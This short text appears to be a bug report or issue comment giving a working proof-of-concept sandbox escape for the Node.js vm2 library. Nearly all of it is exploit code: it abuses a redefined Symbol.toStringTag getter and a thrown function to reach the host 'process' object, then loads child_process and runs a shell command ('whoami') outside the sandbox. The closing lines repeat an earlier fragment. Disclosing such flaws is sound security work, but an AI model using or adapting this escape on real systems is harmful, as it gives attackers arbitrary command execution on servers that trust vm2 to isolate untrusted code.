Looked again at the code and found that
"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
Symbol = {
get toStringTag(){
throw f=>f.constructor("return process")()
}
};
try{
Buffer.from(new Map());
}catch(f){
Symbol = {};
return f(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
}
}+')()';
try{
console.log(new VM().run(untrusted));
}catch(x){
console.log(x);
}will break out of the vm.
Looked again at the code and found that
will break out of the vm.